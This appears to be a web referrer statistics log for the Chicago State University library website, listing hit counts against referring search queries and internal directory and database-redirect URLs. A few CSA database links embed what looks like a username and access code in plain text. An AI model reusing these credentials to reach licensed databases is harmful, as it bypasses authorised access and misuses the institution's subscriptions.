10  http://www.google.com/search?q=chicago+state+university+library&sourceid=ie7&rls=com.microsoft:en-us:IE-SearchBox&ie=&oe=
10  http://www.google.com/search?q=chicago+state+library&ie=utf-8&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a
10  http://www.google.com/search?sourceid=navclient&gfns=1&ie=UTF-8&rlz=1T4ADBS_enUS238US238&q=chicago+state+university
10  http://www.google.com/search?sitesearch=libnext.csu.edu&q=ebooks
10  http://www.google.com/search?hl=en&ie=ISO-8859-1&q=chicago+state+university&btnG=Google+Search
10  http://www.google.com/search?q=csu.edu&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
10  http://www.google.com/search?sitesearch=libnext.csu.edu&q=rover
10  http://www.google.com/search?sitesearch=libnext.csu.edu&q=apa
10  http://www.google.com/search?client=safari&rls=en&q=csu+library&ie=UTF-8&oe=UTF-8
10  http://www.google.com/search?hl=en&rlz=1T4DKUS_en__215US216&q=chicago+state+university+academics
10  http://www.google.com/search?client=safari&rls=en&q=csu.edu&ie=UTF-8&oe=UTF-8
10  http://www.google.com/search?hl=en&q=how+to+use+databases&btnG=Google+Search
18802http://libnext.csu.edu/journals/index.php
17589http://www.csu.edu/studentinformation/
16819http://libnext.csu.edu/eresources/
16403http://libnext.csu.edu/elearning/
10470http://csu.edu/
10324http://www.csu.edu/locator/AtoZ.html
7841http://libnext.csu.edu/directory/index.html
7257http://search.yahoo.com/search
207  http://search.yahoo.com/search?p=chicago+state+university&sm=Yahoo!+Search&fr=FP-tab-web-t&toggle=1&cop=&ei=UTF-8
203  http://search.yahoo.com/search?p=chicago+state+university&fr=FP-tab-web-t&toggle=1&cop=&ei=UTF-8
172  http://search.yahoo.com/search?p=chicago+state+university&fr=yfp-t-501&toggle=1&cop=mss&ei=UTF-8
140  http://search.yahoo.com/search?p=chicago+state+university&fr=yfp-t-501-s&toggle=1&cop=mss&ei=UTF-8
84  http://search.yahoo.com/search?fr=sbc-web&tab=&p=chicago+state+university&btn=Search
78  http://search.yahoo.com/search?fr=yfp-t-701-s&toggle=1&cop=mss&ei=UTF8&p=chicago state university
75  http://search.yahoo.com/search?p=chicago+state+university+homepage&fr=yfp-t-501-s&toggle=1&cop=mss&ei=UTF-8
70  http://search.yahoo.com/search?p=chicago+state+university&fr=ieas
69  http://search.yahoo.com/search?p=csu.edu&toggle=1&cop=mss&ei=UTF-8&fr=yfp-t-701
63  http://search.yahoo.com/search?ei=utf-8&fr=slv1-&p=chicago+state+university
54  http://search.yahoo.com/search?fr=sbc-web&tab=&p=chicago+state+university
52  http://search.yahoo.com/search?p=www.csu.edu&fr=yfp-t-501&toggle=1&cop=mss&ei=UTF-8
49  http://search.yahoo.com/search?ei=utf-8&fr=slv1-iy&p=chicago state university
49  http://search.yahoo.com/search?p=Chicago+State+University&fr=yfp-t-501&toggle=1&cop=mss&ei=UTF-8
48  http://search.yahoo.com/search?p=www.csu.edu&sm=Yahoo!+Search&fr=FP-tab-web-t&toggle=1&cop=&ei=UTF-8
43  http://search.yahoo.com/search?p=www.csu.edu&toggle=1&cop=mss&ei=UTF-8&fr=yfp-t-701
43  http://search.yahoo.com/search?&p=chicago+state+university&fr=ieas
37  http://search.yahoo.com/search?&p=csu.edu&fr=ieas-dns
35  http://search.yahoo.com/search?p=chicago+state+university&sm=Yahoo!+Search&fr=FP-tab-web-t-376&toggle=1&cop=&ei=UTF-8
31  http://search.yahoo.com/search?p=Chicago+State+University&fr=FP-tab-web-t&toggle=1&cop=&ei=UTF-8
30  http://search.yahoo.com/search?p=csu.edu&fr=ieas-dns
29  http://search.yahoo.com/search?p=Chicago+State+University&sm=Yahoo!+Search&fr=FP-tab-web-t&toggle=1&cop=&ei=UTF-8
28  http://search.yahoo.com/search?p=csu.edu&fr=yfp-t-501&toggle=1&cop=mss&ei=UTF-8
28  http://search.yahoo.com/search?p=chicago+state+university&fr=att-portal-s&toggle=1&cop=&ei=UTF-8
27  http://search.yahoo.com/search?ei=utf-8&fr=slv1-adbe&p=chicago+state+university
26  http://search.yahoo.com/search?p=chicago+state+university&toggle=1&cop=mss&ei=UTF-8&fr=yfp-t-701
25  http://search.yahoo.com/search?ei=utf-8&fr=slv1-msgr&p=chicago+state+university
25  http://search.yahoo.com/search?p=chicago+state+university&fr=FP-tab-web-t400&toggle=1&cop=&ei=UTF-8
25  http://search.yahoo.com/search?ei=UTF-8&fr=yfp-t-501-s&p=chicago+state+university+homepage&rs=0&fr2=rs-top
24  http://search.yahoo.com/search?p=chicago+state+university&fr=yfp-t-500&toggle=1&cop=&ei=UTF-8
22  http://search.yahoo.com/search?p=csu.edu&toggle=1&cop=mss&ei=UTF-8&fr=yfp-t-892
22  http://search.yahoo.com/search?p=chicago+state+university&csz=Chicago,+IL&fr=my-myy&toggle=1&cop=&ei=UTF-8
21  http://search.yahoo.com/search?fr=sbc-web&tab=&p=Chicago+State+University&btn=Search
21  http://search.yahoo.com/search?p=chicago+state+university+home+page&fr=yfp-t-501-s&toggle=1&cop=mss&ei=UTF-8
19  http://search.yahoo.com/search?p=csu.edu&fr=FP-tab-web-t&toggle=1&cop=&ei=UTF-8
18  http://search.yahoo.com/search?p=chicago+state+university&fr=FP-tab-web-t500&toggle=1&cop=&ei=UTF-8
18  http://search.yahoo.com/search?p=chicago+state+university&prssweb=Search&ei=UTF-8&fr=FP-tab-web-t&x=wrt
18  http://search.yahoo.com/search?fr=sbc-web&tab=&p=www.csu.edu&btn=Search
17  http://search.yahoo.com/search?p=chicago+state+university&ei=UTF-8&fr=FP-tab-web-t&x=wrt
17  http://search.yahoo.com/search?ei=utf-8&fr=slv1-wave&p=chicago+state+university
17  http://search.yahoo.com/search?p=csu.edu&fr=att-portal&toggle=1&cop=&ei=UTF-8
16  http://search.yahoo.com/search?ei=utf-8&fr=slv1-&p=csu.edu
16  http://search.yahoo.com/search?p=chicago+state+university&fr=yfp-t-203-s&toggle=1&cop=mss&ei=UTF-8
16  http://search.yahoo.com/search?fr=sbc-web&tab=&p=Chicago+State+University+Library&btn=Search
15  http://search.yahoo.com/search?p=CHICAGO+STATE+UNIVERSITY&fr=yfp-t-501&toggle=1&cop=mss&ei=UTF-8
15  http://search.yahoo.com/search?p=chicago+state+university+library&fr=yfp-t-501&toggle=1&cop=mss&ei=UTF-8
14  http://search.yahoo.com/search?p=chicago+state+university&fr=ush1-mail
14  http://search.yahoo.com/search?fr=yfp-t-701-1-s&toggle=1&cop=mss&ei=UTF8&p=chicago state university
14  http://search.yahoo.com/search?ei=utf-8&fr=slv8-&p=csu.edu&type=
14  http://search.yahoo.com/search?p=csu.edu&toggle=1&cop=mss&ei=UTF-8&fr=fptb-msgr
14  http://search.yahoo.com/search?p=chicago+state+university&fr=att-portal&toggle=1&cop=&ei=UTF-8
13  http://search.yahoo.com/search?p=www.csu.edu&csz=&fr=att-portal&toggle=1&cop=&ei=UTF-8
13  http://search.yahoo.com/search?p=chicago+state+university&ei=UTF-8&fr=FP-tab-web-t&fl=0&x=wrt
13  http://search.yahoo.com/search?fr=sbc-web&tab=&p=Chicago+State+University
13  http://search.yahoo.com/search?ei=UTF-8&fr=yfp-t-501&p=chicago+state+university+homepage&rs=0&fr2=rs-top
13  http://search.yahoo.com/search?p=csu.edu&sm=Yahoo!+Search&fr=FP-tab-web-t&toggle=1&cop=&ei=UTF-8
13  http://search.yahoo.com/search?p=www.csu.edu&fr=FP-tab-web-t&toggle=1&cop=&ei=UTF-8
12  http://search.yahoo.com/search?ei=utf-8&fr=slv1-msgr&p=chicago state university
12  http://search.yahoo.com/search?p=academic+library&fr=yfp-t-501&toggle=1&cop=mss&ei=UTF-8&vc=&fp_ip=MY
12  http://search.yahoo.com/search?p=csu.edu&toggle=1&cop=mss&ei=UTF-8&fr=yfp-t-964
12  http://search.yahoo.com/search?fr=FP-pull-web-t&p=chicago+state+university
12  http://search.yahoo.com/search?p=chicago+state+university&prssweb=Search&ei=UTF-8&fr=FP-tab-web-t&fl=0&x=wrt
12  http://search.yahoo.com/search?ei=utf-8&fr=slv8-sbc&p=csu.edu&type=
11  http://search.yahoo.com/search?ei=utf-8&fr=slv1-mdp&p=chicago state university
11  http://search.yahoo.com/search?ei=utf-8&fr=slv8-hptb5&p=chicago state university&type=
11  http://search.yahoo.com/search?p=chicago+state+university+library&fr=yfp-t-501&toggle=1&cop=mss&ei=UTF-8&fp_ip=MY&vc=
11  http://search.yahoo.com/search?fr=ush2-mail&ei=UTF-8&p=www.csu.edu
10  http://search.yahoo.com/search?fr=sbc-web&tab=&p=csu.edu&btn=Search
10  http://search.yahoo.com/search?p=www.csu.edu&fr=yfp-t-203&toggle=1&cop=mss&ei=UTF-8
10  http://search.yahoo.com/search?ei=utf-8&fr=slv1-sbc&p=chicago+state+university
10  http://search.yahoo.com/search?p=chicago+state+university+library&toggle=1&cop=mss&ei=UTF-8&fr=yfp-t-701
10  http://search.yahoo.com/search?p=academic+library&fr=yfp-t-501-s&toggle=1&cop=mss&ei=UTF-8&vc=&fp_ip=MY
10  http://search.yahoo.com/search?fr=yfp-t-701-s&toggle=1&cop=mss&ei=UTF8&p=chicago state university library
6907http://libnext.csu.edu/cgi-bin/directory/index.py
393  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=M
388  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=ALL
361  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=G
325  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=H
285  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=A
281  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=C
277  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=D
251  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=B
238  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=L
230  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=E
201  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=F
199  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=K
198  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=S
182  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=W
181  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=R
180  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=J
177  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=N
157  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=T
154  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=P
119  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=O
111  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=I
98  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISPS&unit=CIRCULATION&useunit=Y
91  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISARS&letter=
89  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=V
84  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=U
83  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISAS&letter=
81  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=Y
79  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=Q
78  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISTS&letter=
71  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISASC&letter=
68  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=X
52  http://libnext.csu.edu/cgi-bin/directory/index.py?letter=Z
42  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISPS
40  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISPS&unit=GOVERNMENT&useunit=Y
37  http://libnext.csu.edu/cgi-bin/directory/index.py?department=ALL&letter=
28  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISARS
27  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISPS&letter=
21  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISPS&unit=REFERENCE&useunit=Y
14  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISPS&unit=CIRCULATION&useunit-Y
10  http://libnext.csu.edu/cgi-bin/directory/index.py?department=LISAS
6554http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py
1037  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.aspx?authtype=ip,uid&profile=ehost&defaultdb=a9h&databasename=Academic Search Complete
337  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/&databasename=EBSCO databases
208  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ArticleFirst;FSIP&databasename=ArticleFirst&&dbname=newfirstsearch.oclc.org/dbname=ArticleFirst;FSIP
206  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=atoz.ebsco.com/home.asp?ID=cgcsu&databasename=EBSCO AtoZ
175  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=eric&databasename=ERIC (EBSCO)
164  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=ehh&databasename=Education Research Complete
164  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.jstor.org/action/showAdvancedSearch&databasename=JSTOR
150  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=rzh&databasename=CINAHL Plus with Full Text
101  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=GPO;FSIP&databasename=GPO&&dbname=newfirstsearch.oclc.org/dbname=GPO;FSIP
96  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=pdh&databasename=PsycARTICLES
85  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=psyh&databasename=PsycINFO
75  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.aspx?authtype=ip,uid&profile=ehost&defaultdb=a9h&databasename=Academic Search Complete&&dbname=search.ebscohost.com/login.aspx?authtype=ip,uid&profile=ehost&defaultdb=a9h
74  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=aph&dbname=Academic Search Premier
67  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=web.lexis-nexis.com/universe&databasename=Lexis-Nexis Academic Universe - General
51  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=aabd.chadwyck.com/&databasename=African American Biographical Database
49  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.aspx?authtype=ip,uid&profile=ehost&defaultdb=bsh&databasename=Business Source Elite
42  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=MEDLINE;FSIP&databasename=Medline
40  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=mnh&databasename=MEDLINE with Full Text
39  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.refworks.com&databasename=RefWorks
38  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.csa.com/htbin/dbrng.cgi?username=cstateu9&access=cstateu9009&databasename=Physical%2520Education%2520Index
38  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/psych&databasename=Annual Review of Psychology
38  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login&databasename=ProQuest Databases
37  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=ChicagoStateUni.NaxosMusicLibrary.com/Jazz&databasename=Naxos Music Library - Jazz
37  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=MEDLINE;FSIP&dbname=newfirstsearch.oclc.org/dbname=MEDLINE;FSIP
37  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTExMjE@&clientId=45998&databasename=Criminal+Justice+Periodicals
37  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=web.lexis-nexis.com/universe&databasename=Lexis-Nexis Academic Universe - Medical
36  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/biochem&databasename=Annual Review of Biochemistry
36  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ArticleFirst;FSIP&databasename=ArticleFirst
34  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTExMjE@&clientId=45998&databasename=Criminal Justice Periodicals
34  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.artstor.org&databasename=ARTstor
34  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&databasename=Newsbank
34  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.medlineplus.gov&databasename=MEDLINE Plus
33  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTFDNUU@&clientId=45998&dbname=Education Journals (ProQuest)
32  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=mzh&dbname=search.ebscohost.com/login.asp?profile=web&defaultdb=mzh
30  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.grovemusic.com/&databasename=Groves Music Online
30  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.ncbi.nlm.nih.gov/pubmed/advanced&databasename=PubMed
30  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.aspx?authtype=ip,uid&profile=bsedata&defaultdb=bsh&databasename=Datamonitor Company Profiles
29  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=WorldCat;FSIP&databasename=WorldCat
29  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=eric&dbname=ERIC (EBSCO)
26  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=atoz.ebsco.com/home.asp?ID=cgcsu&databasename=EBSCO%2520AtoZ
26  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=atoz.ebsco.com/home.asp?ID=cgcsu&databasename=EBSCO AtoZ&&dbname=atoz.ebsco.com/home.asp?ID=cgcsu
26  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/&databasename=EBSCO databases&&dbname=search.ebscohost.com/
26  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=ahl&databasename=America: History and Life
25  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ABI_INFORM;FSIP&dbname=ABI Inform
24  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=aph&dbname=Academic Search Premier
23  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=online.lexi.com&databasename=Lexi-Comp ONLINE
22  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ABI_INFORM;FSIP&dbname=newfirstsearch.oclc.org/dbname=ABI_INFORM;FSIP
21  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=atoz.ebsco.com/home.asp?ID=cgcsu&dbname=EBSCO AtoZ
19  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=pdh&dbname=PsycARTICLES
18  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=lih&databasename=Library, Information Science & Technology Abstracts
18  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=ehh&databasename=Education Research Complete&&dbname=search.ebscohost.com/login.asp?profile=web&defaultdb=ehh
18  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=gateway.ovid.com/ovidweb.cgi?T=JS&MODE=ovid&NEWS=n&PAGE=main&D=clre&databasename=NASW%2520Clinical%2520Register
18  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ECO;FSIP&databasename=ECO: OCLC list of scholarly journals
17  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/soc&databasename=Annual Review of Sociology
17  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=web.lexis-nexis.com/universe&databasename=LexisNexis Academic Universe
17  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.search.eb.com/&databasename=Encyclopedia Britannica
16  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.lexisnexis.com/us/lnacademic/search/flap.do?flapID=companies&databasename=Lexis-Nexis Academic Universe - Business
16  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=web.lexis-nexis.com/universe&dbname=web.lexis-nexis.com/universe
16  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=atoz.ebsco.com/home.asp?ID=cgcsu&dbname=atoz.ebsco.com/home.asp?ID=cgcsu
16  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.jstor.org/action/showAdvancedSearch&databasename=JSTOR&&dbname=www.jstor.org/action/showAdvancedSearch
16  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTFDNUU@&clientId=45998&dbname=ProQuest Education Journals
15  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/FSIP&dbname=newfirstsearch.oclc.org/FSIP
15  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=funk&databasename=Funk & Wagnalls New World Encyclopedia&&dbname=search.ebscohost.com/login.asp?profile=web&defaultdb=funk
15  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=go.galegroup.com/ps/start.do?p=GVRL&u=uiuc_csu&authCount=1&databasename=Gale Virtual Reference Library
15  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTExMjE@&clientId=45998&databasename=Criminal+Justice+Periodicals&&dbname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTExMjE@&clientId=45998
15  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=hch&databasename=Health Source: Nursing/Academic Edition
15  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=gateway.ovid.com/ovidweb.cgi?T=JS&MODE=ovid&NEWS=n&PAGE=main&D=swab&databasename=Social Work Abstracts
14  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/&dbname=EBSCO databases
14  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPUcw&clientId=45998&dbname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPUcw&clientId=45998
14  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/publhealth&databasename=Annual Review of Public Health
14  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=psyh&databasename=PsycINFO&&dbname=search.ebscohost.com/login.asp?profile=web&defaultdb=psyh
13  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&dbname=Newsbank
13  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPTFDNUU@&clientId=45998&databasename=Education Journals (ProQuest)
13  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ERIC;FSIP&dbname=ERIC (FirstSearch)
13  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=hia&databasename=Historical Abstracts
13  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=sph&databasename=SPORTDiscus
13  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.2facts.com/stories/mainmenu.asp&dbname=FACTS.com
13  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=gateway.ovid.com/ovidweb.cgi?T=JS&MODE=ovid&NEWS=n&PAGE=main&D=swab&databasename=Social%2520Work%2520Abstracts
13  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.xreferplus.com&databasename=Xreferplus
13  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPUcw&clientId=45998&databasename=ProQuest databases
12  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.aspx?authtype=ip,uid&profile=ehost&defaultdb=swh&databasename=Social Work Abstracts
12  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.epnet.com/login.asp?profile=web&defaultdb=rzh&dbname=CINAHL Plus with Full Text
12  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=online.factsandcomparisons.com&databasename=Facts & Comparisons%C2%AE 4.0
12  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=aabd.chadwyck.com/&dbname=African American Biographical Database
11  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=proquest.umi.com/login?COPT=SU5UPTAmVkVSPTImREJTPUcw&clientId=45998&dbname=ProQuest databases
11  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.proquest.com/criminaljusticeperiodicals/advanced&databasename=Criminal Justice Periodicals
11  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=eric&databasename=ERIC (EBSCO)&&dbname=search.ebscohost.com/login.asp?profile=web&defaultdb=eric
11  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=sb2.abc-clio.com:81/&dbname=America: History and Life
11  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=ilcso.illinois.edu/&dbname=Social Work Abstracts
11  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.2facts.com/Direct2.aspx?ItemID=WE57&ID=95663&databasename=Issues and Controversies
11  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&databasename=Chicago Tribune
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/GoToSite.aspx?authtype=ip&return=y&authpid=bir&databasename=Book Index with Reviews
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.pubmedcentral.nih.gov/&databasename=PubMed Central
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.csa.com/htbin/dbrng.cgi?username=cstateu9&access=cstateu9009&databasename=Physical Education Index
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=srck5&databasename=Kids Search
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com&databasename=New York Times - Current
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=infoweb.newsbank.com/iw-search/we/Homepage?p_action=doc&p_theme=current&p_nbid=X6CQ5BGSMTEyNDk5NjgyMy40NDUzOTk6MToxMjo2Ni4xNTguMjguNDI&dbname=Newsbank
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=newfirstsearch.oclc.org/dbname=ArticleFirst;FSIP&dbname=ArticleFirst
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=www.jstor.org/action/
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=arjournals.annualreviews.org/loi/biophys&dbname=arjournals.annualreviews.org/loi/biophys
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=search.ebscohost.com/login.asp?profile=web&defaultdb=aph&databasename=Academic Search Premier
10  http://libnext.csu.edu/cgi-bin/eresources/remoteinfo.py?linkname=gateway.ovid.com/ovidweb.cgi?T=JS&MODE=ovid&NEWS=n&PAGE=main&D=swab&dbname=Social Work Abstracts
6114http://libnext.csu.edu/directory/
5878http://csuonline.blackboard.com/webapps/portal/frameset.jsp
5863  http://csuonline.blackboard.com/webapps/portal/frameset.jsp?tab_id=_141_1
11  http://csuonline.blackboard.com/webapps/portal/frameset.jsp?tab_id=_2_1&url=/webapps/blackboard/execute/launcher%3Ftype%3DCourse%26id%3D_31279_1%26url%3D
